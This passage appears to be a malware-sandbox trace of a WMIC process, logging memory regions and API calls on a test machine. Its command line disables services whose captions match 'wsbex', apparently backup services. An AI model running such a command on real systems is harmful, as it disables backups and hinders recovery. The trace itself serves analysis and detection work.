0x0 region_type = private name = "private_0x0000000006ed0000" filename = "" Region: id = 4186 start_va = 0x7e95a000 end_va = 0x7e95cfff entry_point = 0x0 region_type = private name = "private_0x000000007e95a000" filename = "" Region: id = 4187 start_va = 0x7e95d000 end_va = 0x7e95ffff entry_point = 0x0 region_type = private name = "private_0x000000007e95d000" filename = "" Region: id = 4188 start_va = 0x7ea83000 end_va = 0x7ea85fff entry_point = 0x0 region_type = private name = "private_0x000000007ea83000" filename = "" Region: id = 4189 start_va = 0x741a0000 end_va = 0x741b0fff entry_point = 0x741a0000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 4190 start_va = 0x740e0000 end_va = 0x7419bfff entry_point = 0x740e0000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 4191 start_va = 0xea0000 end_va = 0xeb4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ea0000" filename = "" Region: id = 4192 start_va = 0xea0000 end_va = 0xeb4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ea0000" filename = "" Region: id = 4193 start_va = 0x6f10000 end_va = 0x6f38fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006f10000" filename = "" Thread: id = 280 os_tid = 0xfa8 [0117.608] GetModuleHandleA (lpModuleName=0x0) returned 0x1300000 [0117.608] __set_app_type (_Type=0x1) [0117.608] __p__fmode () returned 0x77ac4d6c [0117.608] __p__commode () returned 0x77ac5b1c [0117.608] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x133aa90) returned 0x0 [0117.608] __wgetmainargs (in: _Argc=0x13491a8, _Argv=0x13491ac, _Env=0x13491b0, _DoWildCard=0, _StartInfo=0x13491bc | out: _Argc=0x13491a8, _Argv=0x13491ac, _Env=0x13491b0) returned 0 [0117.608] ??0CHString@@QAE@XZ () returned 0x13495ec [0117.608] ??0CHString@@QAE@XZ () returned 0x13498fc [0117.608] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0117.608] SetConsoleCtrlHandler (HandlerRoutine=0x1334980, Add=1) returned 1 [0117.609] _onexit (_Func=0x1340a20) returned 0x1340a20 [0117.609] _onexit (_Func=0x1340a30) returned 0x1340a30 [0117.609] _onexit (_Func=0x1340a50) returned 0x1340a50 [0117.609] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0117.609] ResolveDelayLoadedAPI () returned 0x770fcd50 [0117.609] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0117.611] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0117.615] CoCreateInstance (in: rclsid=0x1306a1c*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x1306a2c*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x1349510 | out: ppv=0x1349510*=0xa13488) returned 0x0 [0117.625] GetCurrentProcess () returned 0xffffffff [0117.625] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x82fb50 | out: TokenHandle=0x82fb50*=0x158) returned 1 [0117.625] GetTokenInformation (in: TokenHandle=0x158, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x82fb4c | out: TokenInformation=0x0, ReturnLength=0x82fb4c) returned 0 [0117.626] GetTokenInformation (in: TokenHandle=0x158, TokenInformationClass=0x3, TokenInformation=0x973a38, TokenInformationLength=0x118, ReturnLength=0x82fb4c | out: TokenInformation=0x973a38, ReturnLength=0x82fb4c) returned 1 [0117.626] AdjustTokenPrivileges (in: TokenHandle=0x158, DisableAllPrivileges=0, NewState=0x973a38*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0117.626] CloseHandle (hObject=0x158) returned 1 [0117.626] SetThreadUILanguage (LangId=0x0) returned 0x409 [0117.628] _vsnwprintf (in: _Buffer=0x973ac8, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x82fad8 | out: _Buffer="ms_409") returned 6 [0117.628] GetComputerNameW (in: lpBuffer=0x973b10, nSize=0x82fb3c | out: lpBuffer="LHNIWSJ", nSize=0x82fb3c) returned 1 [0117.628] lstrlenW (lpString="LHNIWSJ") returned 7 [0117.628] lstrlenW (lpString="LHNIWSJ") returned 7 [0117.628] ResolveDelayLoadedAPI () returned 0x74d5c5f0 [0117.628] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x82fb50 | out: lpNameBuffer=0x0, nSize=0x82fb50) returned 0x0 [0117.629] GetLastError () returned 0xea [0117.629] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x973b38, nSize=0x82fb50 | out: lpNameBuffer="LHNIWSJ\\CIiHmnxMn6Ps", nSize=0x82fb50) returned 0x1 [0117.629] lstrlenW (lpString="") returned 0 [0117.629] lstrlenW (lpString="LHNIWSJ") returned 7 [0117.629] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="", cchCount2=0) returned 3 [0117.630] lstrlenW (lpString=".") returned 1 [0117.630] lstrlenW (lpString="LHNIWSJ") returned 7 [0117.630] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2=".", cchCount2=1) returned 3 [0117.630] lstrlenW (lpString="LOCALHOST") returned 9 [0117.630] lstrlenW (lpString="LHNIWSJ") returned 7 [0117.630] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="LOCALHOST", cchCount2=9) returned 1 [0117.630] lstrlenW (lpString="LHNIWSJ") returned 7 [0117.630] lstrlenW (lpString="LHNIWSJ") returned 7 [0117.630] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="LHNIWSJ", cchCount2=7) returned 2 [0117.630] lstrlenW (lpString="LHNIWSJ") returned 7 [0117.630] lstrlenW (lpString="LHNIWSJ") returned 7 [0117.630] lstrlenW (lpString="LHNIWSJ") returned 7 [0117.630] lstrlenW (lpString="LHNIWSJ") returned 7 [0117.631] ResolveDelayLoadedAPI () returned 0x77bb9840 [0117.632] SysStringLen (param_1="IDENTIFY") returned 0x8 [0117.632] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0117.632] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0117.632] SysStringLen (param_1="IDENTIFY") returned 0x8 [0117.632] SysStringLen (param_1="IMPERSONATE") returned 0xb [0117.632] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0117.632] SysStringLen (param_1="IMPERSONATE") returned 0xb [0117.633] SysStringLen (param_1="IDENTIFY") returned 0x8 [0117.633] SysStringLen (param_1="IDENTIFY") returned 0x8 [0117.633] SysStringLen (param_1="IMPERSONATE") returned 0xb [0117.633] SysStringLen (param_1="DELEGATE") returned 0x8 [0117.633] SysStringLen (param_1="IDENTIFY") returned 0x8 [0117.633] SysStringLen (param_1="DELEGATE") returned 0x8 [0117.633] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0117.633] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0117.633] SysStringLen (param_1="DELEGATE") returned 0x8 [0117.633] SysStringLen (param_1="NONE") returned 0x4 [0117.633] SysStringLen (param_1="DEFAULT") returned 0x7 [0117.633] SysStringLen (param_1="DEFAULT") returned 0x7 [0117.633] SysStringLen (param_1="NONE") returned 0x4 [0117.633] SysStringLen (param_1="CONNECT") returned 0x7 [0117.633] SysStringLen (param_1="DEFAULT") returned 0x7 [0117.633] SysStringLen (param_1="CALL") returned 0x4 [0117.634] SysStringLen (param_1="DEFAULT") returned 0x7 [0117.634] SysStringLen (param_1="CALL") returned 0x4 [0117.634] SysStringLen (param_1="CONNECT") returned 0x7 [0117.634] SysStringLen (param_1="PKT") returned 0x3 [0117.634] SysStringLen (param_1="DEFAULT") returned 0x7 [0117.634] SysStringLen (param_1="PKT") returned 0x3 [0117.634] SysStringLen (param_1="NONE") returned 0x4 [0117.634] SysStringLen (param_1="NONE") returned 0x4 [0117.634] SysStringLen (param_1="PKT") returned 0x3 [0117.634] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0117.634] SysStringLen (param_1="DEFAULT") returned 0x7 [0117.634] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0117.634] SysStringLen (param_1="NONE") returned 0x4 [0117.634] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0117.634] SysStringLen (param_1="PKT") returned 0x3 [0117.634] SysStringLen (param_1="PKT") returned 0x3 [0117.634] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0117.634] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0117.634] SysStringLen (param_1="DEFAULT") returned 0x7 [0117.634] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0117.634] SysStringLen (param_1="PKT") returned 0x3 [0117.634] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0117.634] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0117.634] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0117.634] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0117.634] GetSystemDirectoryW (in: lpBuffer=0x9729d8, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0117.634] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0117.634] SysStringLen (param_1="\\wbem\\") returned 0x6 [0117.634] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0117.635] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0117.635] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0117.635] GetCurrentThreadId () returned 0xfa8 [0117.635] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x82f660 | out: phkResult=0x82f660*=0x164) returned 0x0 [0117.635] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x82f66c, lpcbData=0x82f668*=0x400 | out: lpType=0x0, lpData=0x82f66c*=0x30, lpcbData=0x82f668*=0x4) returned 0x0 [0117.635] _wcsicmp (_String1="0", _String2="1") returned -1 [0117.635] _wcsicmp (_String1="0", _String2="2") returned -2 [0117.635] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x82f668*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x82f668*=0x42) returned 0x0 [0117.635] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x972be0, lpcbData=0x82f668*=0x42 | out: lpType=0x0, lpData=0x972be0*=0x25, lpcbData=0x82f668*=0x42) returned 0x0 [0117.635] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0117.635] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0117.635] RegQueryValueExW (in: hKey=0x164, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x82f66c, lpcbData=0x82f668*=0x400 | out: lpType=0x0, lpData=0x82f66c*=0x36, lpcbData=0x82f668*=0xc) returned 0x0 [0117.635] _wtol (_String="65536") returned 65536 [0117.635] RegCloseKey (hKey=0x0) returned 0x6 [0117.635] CoCreateInstance (in: rclsid=0x1306a7c*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x1306a8c*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x82fb00 | out: ppv=0x82fb00*=0xf645a8) returned 0x0 [0117.644] FreeThreadedDOMDocument:IXMLDOMDocument:Load (in: This=0xf645a8, xmlSource=0x82fa80*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0x82fae4 | out: isSuccessful=0x82fae4*=0xffff) returned 0x0 [0117.688] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0xf645a8, DOMElement=0x82faf8 | out: DOMElement=0x82faf8) returned 0x0 [0117.690] SysStringLen (param_1="VALUE") returned 0x5 [0117.690] SysStringLen (param_1="TABLE") returned 0x5 [0117.690] SysStringLen (param_1="TABLE") returned 0x5 [0117.690] SysStringLen (param_1="VALUE") returned 0x5 [0117.690] SysStringLen (param_1="LIST") returned 0x4 [0117.690] SysStringLen (param_1="TABLE") returned 0x5 [0117.690] SysStringLen (param_1="RAWXML") returned 0x6 [0117.690] SysStringLen (param_1="TABLE") returned 0x5 [0117.690] SysStringLen (param_1="RAWXML") returned 0x6 [0117.690] SysStringLen (param_1="LIST") returned 0x4 [0117.690] SysStringLen (param_1="LIST") returned 0x4 [0117.690] SysStringLen (param_1="RAWXML") returned 0x6 [0117.691] SysStringLen (param_1="HTABLE") returned 0x6 [0117.691] SysStringLen (param_1="TABLE") returned 0x5 [0117.691] SysStringLen (param_1="HTABLE") returned 0x6 [0117.691] SysStringLen (param_1="LIST") returned 0x4 [0117.691] SysStringLen (param_1="HFORM") returned 0x5 [0117.691] SysStringLen (param_1="TABLE") returned 0x5 [0117.691] SysStringLen (param_1="HFORM") returned 0x5 [0117.691] SysStringLen (param_1="LIST") returned 0x4 [0117.691] SysStringLen (param_1="HFORM") returned 0x5 [0117.691] SysStringLen (param_1="HTABLE") returned 0x6 [0117.692] SysStringLen (param_1="XML") returned 0x3 [0117.692] SysStringLen (param_1="TABLE") returned 0x5 [0117.692] SysStringLen (param_1="XML") returned 0x3 [0117.692] SysStringLen (param_1="VALUE") returned 0x5 [0117.692] SysStringLen (param_1="VALUE") returned 0x5 [0117.692] SysStringLen (param_1="XML") returned 0x3 [0117.692] SysStringLen (param_1="MOF") returned 0x3 [0117.692] SysStringLen (param_1="TABLE") returned 0x5 [0117.692] SysStringLen (param_1="MOF") returned 0x3 [0117.692] SysStringLen (param_1="LIST") returned 0x4 [0117.692] SysStringLen (param_1="MOF") returned 0x3 [0117.692] SysStringLen (param_1="RAWXML") returned 0x6 [0117.692] SysStringLen (param_1="LIST") returned 0x4 [0117.692] SysStringLen (param_1="MOF") returned 0x3 [0117.693] SysStringLen (param_1="CSV") returned 0x3 [0117.693] SysStringLen (param_1="TABLE") returned 0x5 [0117.693] SysStringLen (param_1="CSV") returned 0x3 [0117.693] SysStringLen (param_1="LIST") returned 0x4 [0117.693] SysStringLen (param_1="CSV") returned 0x3 [0117.693] SysStringLen (param_1="HTABLE") returned 0x6 [0117.693] SysStringLen (param_1="CSV") returned 0x3 [0117.693] SysStringLen (param_1="HFORM") returned 0x5 [0117.693] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0117.693] SysStringLen (param_1="TABLE") returned 0x5 [0117.693] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0117.693] SysStringLen (param_1="VALUE") returned 0x5 [0117.693] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0117.693] SysStringLen (param_1="XML") returned 0x3 [0117.693] SysStringLen (param_1="XML") returned 0x3 [0117.693] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0117.694] SysStringLen (param_1="texttablewsys") returned 0xd [0117.694] SysStringLen (param_1="TABLE") returned 0x5 [0117.694] SysStringLen (param_1="texttablewsys") returned 0xd [0117.694] SysStringLen (param_1="XML") returned 0x3 [0117.694] SysStringLen (param_1="texttablewsys") returned 0xd [0117.694] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0117.694] SysStringLen (param_1="XML") returned 0x3 [0117.694] SysStringLen (param_1="texttablewsys") returned 0xd [0117.694] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0117.694] SysStringLen (param_1="TABLE") returned 0x5 [0117.694] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0117.694] SysStringLen (param_1="XML") returned 0x3 [0117.694] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0117.694] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0117.694] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0117.694] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0117.695] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0117.695] SysStringLen (param_1="TABLE") returned 0x5 [0117.695] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0117.695] SysStringLen (param_1="XML") returned 0x3 [0117.695] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0117.695] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0117.695] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0117.695] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0117.695] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0117.695] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0117.695] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0117.695] SysStringLen (param_1="TABLE") returned 0x5 [0117.695] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0117.695] SysStringLen (param_1="XML") returned 0x3 [0117.695] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0117.695] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0117.695] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0117.695] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0117.696] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0117.696] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0117.696] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0117.696] SysStringLen (param_1="TABLE") returned 0x5 [0117.696] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0117.696] SysStringLen (param_1="XML") returned 0x3 [0117.696] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0117.696] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0117.696] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0117.696] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0117.696] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0117.696] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0117.696] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0117.696] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0117.696] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0117.696] SysStringLen (param_1="TABLE") returned 0x5 [0117.696] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0117.697] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0117.697] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0117.697] SysStringLen (param_1="XML") returned 0x3 [0117.697] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0117.697] SysStringLen (param_1="texttablewsys") returned 0xd [0117.697] SysStringLen (param_1="XML") returned 0x3 [0117.697] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0117.697] SysStringLen (param_1="htable-sortby") returned 0xd [0117.697] SysStringLen (param_1="TABLE") returned 0x5 [0117.697] SysStringLen (param_1="htable-sortby") returned 0xd [0117.697] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0117.697] SysStringLen (param_1="htable-sortby") returned 0xd [0117.697] SysStringLen (param_1="XML") returned 0x3 [0117.697] SysStringLen (param_1="htable-sortby") returned 0xd [0117.697] SysStringLen (param_1="texttablewsys") returned 0xd [0117.697] SysStringLen (param_1="htable-sortby") returned 0xd [0117.697] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0117.697] SysStringLen (param_1="XML") returned 0x3 [0117.697] SysStringLen (param_1="htable-sortby") returned 0xd [0117.698] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0117.698] SysStringLen (param_1="TABLE") returned 0x5 [0117.698] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0117.698] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0117.698] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0117.698] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0117.698] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0117.698] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0117.698] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0117.698] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0117.698] SysStringLen (param_1="wmiclimofformat") returned 0xf [0117.698] SysStringLen (param_1="TABLE") returned 0x5 [0117.698] SysStringLen (param_1="wmiclimofformat") returned 0xf [0117.698] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0117.698] SysStringLen (param_1="wmiclimofformat") returned 0xf [0117.698] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0117.698] SysStringLen (param_1="wmiclimofformat") returned 0xf [0117.698] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0117.698] SysStringLen (param_1="wmiclimofformat") returned 0xf [0117.698] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0117.698] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0117.698] SysStringLen (param_1="wmiclimofformat") returned 0xf [0117.699] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0117.699] SysStringLen (param_1="TABLE") returned 0x5 [0117.699] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0117.699] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0117.699] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0117.699] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0117.699] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0117.699] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0117.699] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0117.699] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0117.699] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0117.699] SysStringLen (param_1="TABLE") returned 0x5 [0117.699] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0117.699] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0117.699] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0117.699] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0117.699] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0117.699] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0117.699] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0117.699] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0117.699] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0117.699] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0117.699] FreeThreadedDOMDocument:IUnknown:Release (This=0xf645a8) returned 0x0 [0117.700] GetCommandLineW () returned="WMIC SERVICE WHERE 'caption LIKE '%wsbex%'' CALL ChangeStartMode 'Disabled'" [0117.700] memcpy_s (in: _Destination=0x978058, _DestinationSize=0x9e, _Source=0xa01588, _SourceSize=0x9a | out: _Destination=0x978058) returned 0x0 [0117.700] GetLocalTime (in: lpSystemTime=0x82faa8 | out: lpSystemTime=0x82faa8*(wYear=0x7e2, wMonth=0x4, wDayOfWeek=0x0, wDay=0xf, wHour=0xa, wMinute=0x9, wSecond=0xa, wMilliseconds=0x234)) [0117.700] _vsnwprintf (in: _Buffer=0x978100, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x82fa88 | out: _Buffer="04-15-2018T10:09:10") returned 19 [0117.700] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%wsbex%'' CALL ChangeStartMode 'Disabled'") returned 73 [0117.700] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%wsbex%'' CALL ChangeStartMode 'Disabled'") returned 73 [0117.700] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%wsbex%'' CALL ChangeStartMode 'Disabled'") returned 73 [0117.700] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%wsbex%'' CALL ChangeStartMode 'Disabled'") returned 73 [0117.700] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%wsbex%'' CALL ChangeStartMode 'Disabled'") returned 73 [0117.700] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%wsbex%'' CALL ChangeStartMode 'Disabled'") returned 73 [0117.700] lstrlenW (lpString="SERVICE") returned 7 [0117.700] _wcsicmp (_String1="SERVICE", _String2="\"NULL\"") returned 81 [0117.700] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%wsbex%'' CALL ChangeStartMode 'Disabled'") returned 73 [0117.700] lstrlenW (lpString="WHERE") returned 5 [0117.700] _wcsicmp (_String1="WHERE", _String2="\"NULL\"") returned 85 [0117.700] memmove_s (in: _Destination=0x972c78, _DestinationSize=0x4, _Source=0x972c68, _SourceSize=0x4 | out: _Destination=0x972c78) returned 0x0 [0117.700] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%wsbex%'' CALL ChangeStartMode 'Disabled'") returned 73 [0117.700] lstrlenW (lpString="'caption LIKE '%wsbex%''") returned 24 [0117.700] _wcsicmp (_String1="'caption LIKE '%wsbex%''", _String2="\"NULL\"") returned 5 [0117.700] lstrlenW (lpString="'caption LIKE '%wsbex%''") returned 24 [0117.700] lstrlenW (lpString="'caption LIKE '%wsbex%''") returned 24 [0117.700] memmove_s (in: _Destination=0x977d88, _DestinationSize=0x8, _Source=0x972c78, _SourceSize=0x8 | out: _Destination=0x977d88) returned 0x0 [0117.700] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%wsbex%'' CALL ChangeStartMode 'Disabled'") returned 73 [0117.701] lstrlenW (lpString="CALL") returned 4 [0117.701] _wcsicmp (_String1="CALL", _String2="\"NULL\"") returned 65 [0117.701] memmove_s (in: _Destination=0x977f98, _DestinationSize=0xc, _Source=0x977d88, _SourceSize=0xc | out: _Destination=0x977f98) returned 0x0 [0117.701] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%wsbex%'' CALL ChangeStartMode 'Disabled'") returned 73 [0117.701] lstrlenW (lpString="ChangeStartMode") returned 15 [0117.701] _wcsicmp (_String1="ChangeStartMode", _String2="\"NULL\"") returned 65 [0117.701] memmove_s (in: _Destination=0x9725b8, _DestinationSize=0x10, _Source=0x977f98, _SourceSize=0x10 | out: _Destination=0x9725b8) returned 0x0 [0117.701] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%wsbex%'' CALL ChangeStartMode 'Disabled'") returned 73 [0117.701] lstrlenW (lpString="'Disabled'") returned 10 [0117.701] _wcsicmp (_String1="'Disabled'", _String2="\"NULL\"") returned 5 [0117.701] lstrlenW (lpString="'Disabled'") returned 10 [0117.701] lstrlenW 